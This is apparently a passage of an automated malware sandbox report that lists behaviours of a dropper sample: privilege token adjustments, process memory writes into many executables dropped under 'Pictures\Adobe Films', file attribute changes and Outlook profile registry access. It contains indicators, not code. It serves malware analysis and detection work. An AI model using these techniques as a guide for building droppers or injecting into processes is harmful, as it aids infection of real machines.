N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Suspicious behavior: GetForegroundWindowSpam

Description Indicator Process Target
N/A N/A N/A N/A

Suspicious behavior: MapViewOfSection

Description Indicator Process Target
N/A N/A C:\Users\Admin\Pictures\Adobe Films\TUsKZ9i3PovwwAgsSaLpghkJ.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Itvrzxmax2.exe N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\6DF1.exe N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\8AF1.exe N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\SETUP_~2.EXE N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\Pictures\Adobe Films\wd1PHHYFXTO2GwSbYNeKiEhd.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\Pictures\Adobe Films\4AqwIgOuAzGydA7_h8I9ZZtr.exe N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\Pictures\Adobe Films\uw5KPJ6a18gzLPne_F5e0c1_.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\Pictures\Adobe Films\vl16pz8ikehSoCEiO6vpU86F.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\RunDll32.exe N/A
Token: SeShutdownPrivilege N/A N/A N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\Tal.exe.pif N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\Tal.exe.pif N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\Tal.exe.pif N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\Tal.exe.pif N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\Tal.exe.pif N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\Tal.exe.pif N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Suspicious use of SendNotifyMessage

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\Tal.exe.pif N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\Tal.exe.pif N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\Tal.exe.pif N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\Tal.exe.pif N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\Tal.exe.pif N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\Tal.exe.pif N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Suspicious use of UnmapMainImage

Description Indicator Process Target
N/A N/A N/A N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 3620 wrote to memory of 4196 N/A C:\Users\Admin\AppData\Local\Temp\faae62d9ef3a65ae1dae20d55b8e787661aaf452ad3b6bdd80ea267d3bd070bd.exe C:\Users\Admin\AppData\Local\Temp\faae62d9ef3a65ae1dae20d55b8e787661aaf452ad3b6bdd80ea267d3bd070bd.exe
PID 3620 wrote to memory of 4196 N/A C:\Users\Admin\AppData\Local\Temp\faae62d9ef3a65ae1dae20d55b8e787661aaf452ad3b6bdd80ea267d3bd070bd.exe C:\Users\Admin\AppData\Local\Temp\faae62d9ef3a65ae1dae20d55b8e787661aaf452ad3b6bdd80ea267d3bd070bd.exe
PID 3620 wrote to memory of 4196 N/A C:\Users\Admin\AppData\Local\Temp\faae62d9ef3a65ae1dae20d55b8e787661aaf452ad3b6bdd80ea267d3bd070bd.exe C:\Users\Admin\AppData\Local\Temp\faae62d9ef3a65ae1dae20d55b8e787661aaf452ad3b6bdd80ea267d3bd070bd.exe
PID 3620 wrote to memory of 4196 N/A C:\Users\Admin\AppData\Local\Temp\faae62d9ef3a65ae1dae20d55b8e787661aaf452ad3b6bdd80ea267d3bd070bd.exe C:\Users\Admin\AppData\Local\Temp\faae62d9ef3a65ae1dae20d55b8e787661aaf452ad3b6bdd80ea267d3bd070bd.exe
PID 3620 wrote to memory of 4196 N/A C:\Users\Admin\AppData\Local\Temp\faae62d9ef3a65ae1dae20d55b8e787661aaf452ad3b6bdd80ea267d3bd070bd.exe C:\Users\Admin\AppData\Local\Temp\faae62d9ef3a65ae1dae20d55b8e787661aaf452ad3b6bdd80ea267d3bd070bd.exe
PID 3620 wrote to memory of 4196 N/A C:\Users\Admin\AppData\Local\Temp\faae62d9ef3a65ae1dae20d55b8e787661aaf452ad3b6bdd80ea267d3bd070bd.exe C:\Users\Admin\AppData\Local\Temp\faae62d9ef3a65ae1dae20d55b8e787661aaf452ad3b6bdd80ea267d3bd070bd.exe
PID 3620 wrote to memory of 4196 N/A C:\Users\Admin\AppData\Local\Temp\faae62d9ef3a65ae1dae20d55b8e787661aaf452ad3b6bdd80ea267d3bd070bd.exe C:\Users\Admin\AppData\Local\Temp\faae62d9ef3a65ae1dae20d55b8e787661aaf452ad3b6bdd80ea267d3bd070bd.exe
PID 3620 wrote to memory of 4196 N/A C:\Users\Admin\AppData\Local\Temp\faae62d9ef3a65ae1dae20d55b8e787661aaf452ad3b6bdd80ea267d3bd070bd.exe C:\Users\Admin\AppData\Local\Temp\faae62d9ef3a65ae1dae20d55b8e787661aaf452ad3b6bdd80ea267d3bd070bd.exe
PID 3620 wrote to memory of 4196 N/A C:\Users\Admin\AppData\Local\Temp\faae62d9ef3a65ae1dae20d55b8e787661aaf452ad3b6bdd80ea267d3bd070bd.exe C:\Users\Admin\AppData\Local\Temp\faae62d9ef3a65ae1dae20d55b8e787661aaf452ad3b6bdd80ea267d3bd070bd.exe
PID 3620 wrote to memory of 4196 N/A C:\Users\Admin\AppData\Local\Temp\faae62d9ef3a65ae1dae20d55b8e787661aaf452ad3b6bdd80ea267d3bd070bd.exe C:\Users\Admin\AppData\Local\Temp\faae62d9ef3a65ae1dae20d55b8e787661aaf452ad3b6bdd80ea267d3bd070bd.exe
PID 4196 wrote to memory of 3704 N/A C:\Users\Admin\AppData\Local\Temp\faae62d9ef3a65ae1dae20d55b8e787661aaf452ad3b6bdd80ea267d3bd070bd.exe C:\Users\Admin\Pictures\Adobe Films\sd1gX57A0wItT05S8cNnJS6P.exe
PID 4196 wrote to memory of 3704 N/A C:\Users\Admin\AppData\Local\Temp\faae62d9ef3a65ae1dae20d55b8e787661aaf452ad3b6bdd80ea267d3bd070bd.exe C:\Users\Admin\Pictures\Adobe Films\sd1gX57A0wItT05S8cNnJS6P.exe
PID 4196 wrote to memory of 3704 N/A C:\Users\Admin\AppData\Local\Temp\faae62d9ef3a65ae1dae20d55b8e787661aaf452ad3b6bdd80ea267d3bd070bd.exe C:\Users\Admin\Pictures\Adobe Films\sd1gX57A0wItT05S8cNnJS6P.exe
PID 4196 wrote to memory of 4436 N/A C:\Users\Admin\AppData\Local\Temp\faae62d9ef3a65ae1dae20d55b8e787661aaf452ad3b6bdd80ea267d3bd070bd.exe C:\Users\Admin\Pictures\Adobe Films\1hObAWF58hoo9_jA8jPWtwDx.exe
PID 4196 wrote to memory of 4436 N/A C:\Users\Admin\AppData\Local\Temp\faae62d9ef3a65ae1dae20d55b8e787661aaf452ad3b6bdd80ea267d3bd070bd.exe C:\Users\Admin\Pictures\Adobe Films\1hObAWF58hoo9_jA8jPWtwDx.exe
PID 4196 wrote to memory of 4436 N/A C:\Users\Admin\AppData\Local\Temp\faae62d9ef3a65ae1dae20d55b8e787661aaf452ad3b6bdd80ea267d3bd070bd.exe C:\Users\Admin\Pictures\Adobe Films\1hObAWF58hoo9_jA8jPWtwDx.exe
PID 4196 wrote to memory of 4052 N/A C:\Users\Admin\AppData\Local\Temp\faae62d9ef3a65ae1dae20d55b8e787661aaf452ad3b6bdd80ea267d3bd070bd.exe C:\Users\Admin\Pictures\Adobe Films\EYGVHMYze8w9bXCxKAs0sRH8.exe
PID 4196 wrote to memory of 4052 N/A C:\Users\Admin\AppData\Local\Temp\faae62d9ef3a65ae1dae20d55b8e787661aaf452ad3b6bdd80ea267d3bd070bd.exe C:\Users\Admin\Pictures\Adobe Films\EYGVHMYze8w9bXCxKAs0sRH8.exe
PID 4196 wrote to memory of 4052 N/A C:\Users\Admin\AppData\Local\Temp\faae62d9ef3a65ae1dae20d55b8e787661aaf452ad3b6bdd80ea267d3bd070bd.exe C:\Users\Admin\Pictures\Adobe Films\EYGVHMYze8w9bXCxKAs0sRH8.exe
PID 4196 wrote to memory of 2948 N/A C:\Users\Admin\AppData\Local\Temp\faae62d9ef3a65ae1dae20d55b8e787661aaf452ad3b6bdd80ea267d3bd070bd.exe C:\Users\Admin\Pictures\Adobe Films\4AqwIgOuAzGydA7_h8I9ZZtr.exe
PID 4196 wrote to memory of 2948 N/A C:\Users\Admin\AppData\Local\Temp\faae62d9ef3a65ae1dae20d55b8e787661aaf452ad3b6bdd80ea267d3bd070bd.exe C:\Users\Admin\Pictures\Adobe Films\4AqwIgOuAzGydA7_h8I9ZZtr.exe
PID 4196 wrote to memory of 2948 N/A C:\Users\Admin\AppData\Local\Temp\faae62d9ef3a65ae1dae20d55b8e787661aaf452ad3b6bdd80ea267d3bd070bd.exe C:\Users\Admin\Pictures\Adobe Films\4AqwIgOuAzGydA7_h8I9ZZtr.exe
PID 4196 wrote to memory of 1744 N/A C:\Users\Admin\AppData\Local\Temp\faae62d9ef3a65ae1dae20d55b8e787661aaf452ad3b6bdd80ea267d3bd070bd.exe C:\Users\Admin\Pictures\Adobe Films\wd1PHHYFXTO2GwSbYNeKiEhd.exe
PID 4196 wrote to memory of 1744 N/A C:\Users\Admin\AppData\Local\Temp\faae62d9ef3a65ae1dae20d55b8e787661aaf452ad3b6bdd80ea267d3bd070bd.exe C:\Users\Admin\Pictures\Adobe Films\wd1PHHYFXTO2GwSbYNeKiEhd.exe
PID 4196 wrote to memory of 1744 N/A C:\Users\Admin\AppData\Local\Temp\faae62d9ef3a65ae1dae20d55b8e787661aaf452ad3b6bdd80ea267d3bd070bd.exe C:\Users\Admin\Pictures\Adobe Films\wd1PHHYFXTO2GwSbYNeKiEhd.exe
PID 4196 wrote to memory of 2520 N/A C:\Users\Admin\AppData\Local\Temp\faae62d9ef3a65ae1dae20d55b8e787661aaf452ad3b6bdd80ea267d3bd070bd.exe C:\Users\Admin\Pictures\Adobe Films\jtfXiAYn71DsfeALHUTabEl4.exe
PID 4196 wrote to memory of 2520 N/A C:\Users\Admin\AppData\Local\Temp\faae62d9ef3a65ae1dae20d55b8e787661aaf452ad3b6bdd80ea267d3bd070bd.exe C:\Users\Admin\Pictures\Adobe Films\jtfXiAYn71DsfeALHUTabEl4.exe
PID 4196 wrote to memory of 2520 N/A C:\Users\Admin\AppData\Local\Temp\faae62d9ef3a65ae1dae20d55b8e787661aaf452ad3b6bdd80ea267d3bd070bd.exe C:\Users\Admin\Pictures\Adobe Films\jtfXiAYn71DsfeALHUTabEl4.exe
PID 4196 wrote to memory of 2712 N/A C:\Users\Admin\AppData\Local\Temp\faae62d9ef3a65ae1dae20d55b8e787661aaf452ad3b6bdd80ea267d3bd070bd.exe C:\Users\Admin\Pictures\Adobe Films\CzOCCnZhsTntOC1DD4Afra50.exe
PID 4196 wrote to memory of 2712 N/A C:\Users\Admin\AppData\Local\Temp\faae62d9ef3a65ae1dae20d55b8e787661aaf452ad3b6bdd80ea267d3bd070bd.exe C:\Users\Admin\Pictures\Adobe Films\CzOCCnZhsTntOC1DD4Afra50.exe
PID 4196 wrote to memory of 2712 N/A C:\Users\Admin\AppData\Local\Temp\faae62d9ef3a65ae1dae20d55b8e787661aaf452ad3b6bdd80ea267d3bd070bd.exe C:\Users\Admin\Pictures\Adobe Films\CzOCCnZhsTntOC1DD4Afra50.exe
PID 4196 wrote to memory of 3244 N/A C:\Users\Admin\AppData\Local\Temp\faae62d9ef3a65ae1dae20d55b8e787661aaf452ad3b6bdd80ea267d3bd070bd.exe C:\Users\Admin\Pictures\Adobe Films\FzbLA0y21wf4Eb_GXZGPAkPK.exe
PID 4196 wrote to memory of 3244 N/A C:\Users\Admin\AppData\Local\Temp\faae62d9ef3a65ae1dae20d55b8e787661aaf452ad3b6bdd80ea267d3bd070bd.exe C:\Users\Admin\Pictures\Adobe Films\FzbLA0y21wf4Eb_GXZGPAkPK.exe
PID 4196 wrote to memory of 3244 N/A C:\Users\Admin\AppData\Local\Temp\faae62d9ef3a65ae1dae20d55b8e787661aaf452ad3b6bdd80ea267d3bd070bd.exe C:\Users\Admin\Pictures\Adobe Films\FzbLA0y21wf4Eb_GXZGPAkPK.exe
PID 4196 wrote to memory of 1216 N/A C:\Users\Admin\AppData\Local\Temp\faae62d9ef3a65ae1dae20d55b8e787661aaf452ad3b6bdd80ea267d3bd070bd.exe C:\Users\Admin\Pictures\Adobe Films\Kog456fPoi_qlj0gOuQ1ue72.exe
PID 4196 wrote to memory of 1216 N/A C:\Users\Admin\AppData\Local\Temp\faae62d9ef3a65ae1dae20d55b8e787661aaf452ad3b6bdd80ea267d3bd070bd.exe C:\Users\Admin\Pictures\Adobe Films\Kog456fPoi_qlj0gOuQ1ue72.exe
PID 4196 wrote to memory of 1216 N/A C:\Users\Admin\AppData\Local\Temp\faae62d9ef3a65ae1dae20d55b8e787661aaf452ad3b6bdd80ea267d3bd070bd.exe C:\Users\Admin\Pictures\Adobe Films\Kog456fPoi_qlj0gOuQ1ue72.exe
PID 4196 wrote to memory of 3964 N/A C:\Users\Admin\AppData\Local\Temp\faae62d9ef3a65ae1dae20d55b8e787661aaf452ad3b6bdd80ea267d3bd070bd.exe C:\Users\Admin\Pictures\Adobe Films\kdnmdIr2m3Z75rmoxMQY45zR.exe
PID 4196 wrote to memory of 3964 N/A C:\Users\Admin\AppData\Local\Temp\faae62d9ef3a65ae1dae20d55b8e787661aaf452ad3b6bdd80ea267d3bd070bd.exe C:\Users\Admin\Pictures\Adobe Films\kdnmdIr2m3Z75rmoxMQY45zR.exe
PID 4196 wrote to memory of 3964 N/A C:\Users\Admin\AppData\Local\Temp\faae62d9ef3a65ae1dae20d55b8e787661aaf452ad3b6bdd80ea267d3bd070bd.exe C:\Users\Admin\Pictures\Adobe Films\kdnmdIr2m3Z75rmoxMQY45zR.exe
PID 4196 wrote to memory of 3232 N/A C:\Users\Admin\AppData\Local\Temp\faae62d9ef3a65ae1dae20d55b8e787661aaf452ad3b6bdd80ea267d3bd070bd.exe C:\Users\Admin\Pictures\Adobe Films\_az72zCJh0iBWr5dTACKXrws.exe
PID 4196 wrote to memory of 3232 N/A C:\Users\Admin\AppData\Local\Temp\faae62d9ef3a65ae1dae20d55b8e787661aaf452ad3b6bdd80ea267d3bd070bd.exe C:\Users\Admin\Pictures\Adobe Films\_az72zCJh0iBWr5dTACKXrws.exe
PID 4196 wrote to memory of 3232 N/A C:\Users\Admin\AppData\Local\Temp\faae62d9ef3a65ae1dae20d55b8e787661aaf452ad3b6bdd80ea267d3bd070bd.exe C:\Users\Admin\Pictures\Adobe Films\_az72zCJh0iBWr5dTACKXrws.exe
PID 4196 wrote to memory of 3680 N/A C:\Users\Admin\AppData\Local\Temp\faae62d9ef3a65ae1dae20d55b8e787661aaf452ad3b6bdd80ea267d3bd070bd.exe C:\Users\Admin\Pictures\Adobe Films\HNYUwmuil6MtmEKe7lmDsMC3.exe
PID 4196 wrote to memory of 3680 N/A C:\Users\Admin\AppData\Local\Temp\faae62d9ef3a65ae1dae20d55b8e787661aaf452ad3b6bdd80ea267d3bd070bd.exe C:\Users\Admin\Pictures\Adobe Films\HNYUwmuil6MtmEKe7lmDsMC3.exe
PID 4196 wrote to memory of 3680 N/A C:\Users\Admin\AppData\Local\Temp\faae62d9ef3a65ae1dae20d55b8e787661aaf452ad3b6bdd80ea267d3bd070bd.exe C:\Users\Admin\Pictures\Adobe Films\HNYUwmuil6MtmEKe7lmDsMC3.exe
PID 4196 wrote to memory of 4040 N/A C:\Users\Admin\AppData\Local\Temp\faae62d9ef3a65ae1dae20d55b8e787661aaf452ad3b6bdd80ea267d3bd070bd.exe C:\Users\Admin\Pictures\Adobe Films\vl16pz8ikehSoCEiO6vpU86F.exe
PID 4196 wrote to memory of 4040 N/A C:\Users\Admin\AppData\Local\Temp\faae62d9ef3a65ae1dae20d55b8e787661aaf452ad3b6bdd80ea267d3bd070bd.exe C:\Users\Admin\Pictures\Adobe Films\vl16pz8ikehSoCEiO6vpU86F.exe
PID 4196 wrote to memory of 4040 N/A C:\Users\Admin\AppData\Local\Temp\faae62d9ef3a65ae1dae20d55b8e787661aaf452ad3b6bdd80ea267d3bd070bd.exe C:\Users\Admin\Pictures\Adobe Films\vl16pz8ikehSoCEiO6vpU86F.exe
PID 4196 wrote to memory of 4316 N/A C:\Users\Admin\AppData\Local\Temp\faae62d9ef3a65ae1dae20d55b8e787661aaf452ad3b6bdd80ea267d3bd070bd.exe C:\Users\Admin\Pictures\Adobe Films\FnPK_uULTBfwZezEEGCXaVE6.exe
PID 4196 wrote to memory of 4316 N/A C:\Users\Admin\AppData\Local\Temp\faae62d9ef3a65ae1dae20d55b8e787661aaf452ad3b6bdd80ea267d3bd070bd.exe C:\Users\Admin\Pictures\Adobe Films\FnPK_uULTBfwZezEEGCXaVE6.exe
PID 4196 wrote to memory of 2284 N/A C:\Users\Admin\AppData\Local\Temp\faae62d9ef3a65ae1dae20d55b8e787661aaf452ad3b6bdd80ea267d3bd070bd.exe C:\Users\Admin\Pictures\Adobe Films\l2S7FrWODIlvtiOh9PM4XNlS.exe
PID 4196 wrote to memory of 2284 N/A C:\Users\Admin\AppData\Local\Temp\faae62d9ef3a65ae1dae20d55b8e787661aaf452ad3b6bdd80ea267d3bd070bd.exe C:\Users\Admin\Pictures\Adobe Films\l2S7FrWODIlvtiOh9PM4XNlS.exe
PID 4196 wrote to memory of 2284 N/A C:\Users\Admin\AppData\Local\Temp\faae62d9ef3a65ae1dae20d55b8e787661aaf452ad3b6bdd80ea267d3bd070bd.exe C:\Users\Admin\Pictures\Adobe Films\l2S7FrWODIlvtiOh9PM4XNlS.exe
PID 4196 wrote to memory of 1624 N/A C:\Users\Admin\AppData\Local\Temp\faae62d9ef3a65ae1dae20d55b8e787661aaf452ad3b6bdd80ea267d3bd070bd.exe C:\Users\Admin\Pictures\Adobe Films\H4qQ5eq5WgfPy9pgenBRiiaH.exe
PID 4196 wrote to memory of 1624 N/A C:\Users\Admin\AppData\Local\Temp\faae62d9ef3a65ae1dae20d55b8e787661aaf452ad3b6bdd80ea267d3bd070bd.exe C:\Users\Admin\Pictures\Adobe Films\H4qQ5eq5WgfPy9pgenBRiiaH.exe
PID 4196 wrote to memory of 1624 N/A C:\Users\Admin\AppData\Local\Temp\faae62d9ef3a65ae1dae20d55b8e787661aaf452ad3b6bdd80ea267d3bd070bd.exe C:\Users\Admin\Pictures\Adobe Films\H4qQ5eq5WgfPy9pgenBRiiaH.exe
PID 4196 wrote to memory of 5060 N/A C:\Users\Admin\AppData\Local\Temp\faae62d9ef3a65ae1dae20d55b8e787661aaf452ad3b6bdd80ea267d3bd070bd.exe C:\Users\Admin\Pictures\Adobe Films\TUsKZ9i3PovwwAgsSaLpghkJ.exe
PID 4196 wrote to memory of 5060 N/A C:\Users\Admin\AppData\Local\Temp\faae62d9ef3a65ae1dae20d55b8e787661aaf452ad3b6bdd80ea267d3bd070bd.exe C:\Users\Admin\Pictures\Adobe Films\TUsKZ9i3PovwwAgsSaLpghkJ.exe
PID 4196 wrote to memory of 5060 N/A C:\Users\Admin\AppData\Local\Temp\faae62d9ef3a65ae1dae20d55b8e787661aaf452ad3b6bdd80ea267d3bd070bd.exe C:\Users\Admin\Pictures\Adobe Films\TUsKZ9i3PovwwAgsSaLpghkJ.exe
PID 2520 wrote to memory of 2020 N/A C:\Users\Admin\Pictures\Adobe Films\jtfXiAYn71DsfeALHUTabEl4.exe C:\Users\Admin\Pictures\Adobe Films\jtfXiAYn71DsfeALHUTabEl4.exe
PID 2520 wrote to memory of 2020 N/A C:\Users\Admin\Pictures\Adobe Films\jtfXiAYn71DsfeALHUTabEl4.exe C:\Users\Admin\Pictures\Adobe Films\jtfXiAYn71DsfeALHUTabEl4.exe
PID 2520 wrote to memory of 2020 N/A C:\Users\Admin\Pictures\Adobe Films\jtfXiAYn71DsfeALHUTabEl4.exe C:\Users\Admin\Pictures\Adobe Films\jtfXiAYn71DsfeALHUTabEl4.exe
PID 4316 wrote to memory of 4960 N/A C:\Users\Admin\Pictures\Adobe Films\FnPK_uULTBfwZezEEGCXaVE6.exe C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\SETUP_~2.EXE

Views/modifies file attributes

evasion
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\attrib.exe N/A
N/A N/A C:\Windows\SysWOW64\attrib.exe N/A

outlook_win_path

Description Indicator Process Target
Key opened \REGISTRY\USER\S-1-5-21-2632097139-1792035885-811742494-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook C:\Windows\SysWOW64\rundll32.exe N/A

Processes

C:\Users\Admin\AppData\Local\Temp\faae62d9ef3a65ae1dae20d55b8e787661aaf452ad3b6bdd80ea267d3bd070bd.exe

"C:\Users\Admin\AppData\Local\Temp\faae62d9ef3a65ae1dae20d55b8e787661aaf452ad3b6bdd80ea267d3bd070bd.exe"

C:\Users\Admin\AppData\Local\Temp\faae62d9ef3a65ae1dae20d55b8e787661aaf452ad3b6bdd80ea267d3bd070bd.exe

"C:\Users\Admin\AppData\Local\Temp\faae62d9ef3a65ae1dae20d55b8e787661aaf452ad3b6bdd80ea267d3bd070bd.exe"

C:\Users\Admin\Pictures\Adobe Films\sd1gX57A0wItT05S8cNnJS6P.exe

"C:\Users\Admin\Pictures\Adobe Films\sd1gX57A0wItT05S8cNnJS6P.exe"

C:\Users\Admin\Pictures\Adobe Films\1hObAWF58hoo9_jA8jPWtwDx.exe

"C:\Users\Admin\Pictures\Adobe Films\1hObAWF58hoo9_jA8jPWtwDx.exe"

C:\Users\Admin\Pictures\Adobe Films\EYGVHMYze8w9bXCxKAs0sRH8.exe

"C:\Users\Admin\Pictures\Adobe Films\EYGVHMYze8w9bXCxKAs0sRH8.exe"

C:\Users\Admin\Pictures\Adobe Films\wd1PHHYFXTO2GwSbYNeKiEhd.exe

"C:\Users\Admin\Pictures\Adobe Films\wd1PHHYFXTO2GwSbYNeKiEhd.exe"

C:\Users\Admin\Pictures\Adobe Films\4AqwIgOuAzGydA7_h8I9ZZtr.exe

"C:\Users\Admin\Pictures\Adobe Films\4AqwIgOuAzGydA7_h8I9ZZtr.exe"

C:\Users\Admin\Pictures\Adobe Films\H4qQ5eq5WgfPy9pgenBRiiaH.exe

"C:\Users\Admin\Pictures\Adobe Films\H4qQ5eq5WgfPy9pgenBRiiaH.exe"

C:\Users\Admin\Pictures\Adobe Films\l2S7FrWODIlvtiOh9PM4XNlS.exe

"C:\Users\Admin\Pictures\Adobe Films\l2S7FrWODIlvtiOh9PM4XNlS.exe"

C:\Users\Admin\Pictures\Adobe Films\FnPK_uULTBfwZezEEGCXaVE6.exe

"C:\Users\Admin\Pictures\Adobe Films\FnPK_uULTBfwZezEEGCXaVE6.exe"

C:\Users\Admin\Pictures\Adobe Films\_az72zCJh0iBWr5dTACKXrws.exe

"C:\Users\Admin\Pictures\Adobe Films\_az72zCJh0iBWr5dTACKXrws.exe"

C:\Users\Admin\Pictures\Adobe Films\HNYUwmuil6MtmEKe7lmDsMC3.exe

"C:\Users\Admin\Pictures\Adobe Films\HNYUwmuil6MtmEKe7lmDsMC3.exe"

C:\Users\Admin\Pictures\Adobe Films\vl16pz8ikehSoCEiO6vpU86F.exe

"C:\Users\Admin\Pictures\Adobe Films\vl16pz8ikehSoCEiO6vpU86F.exe"

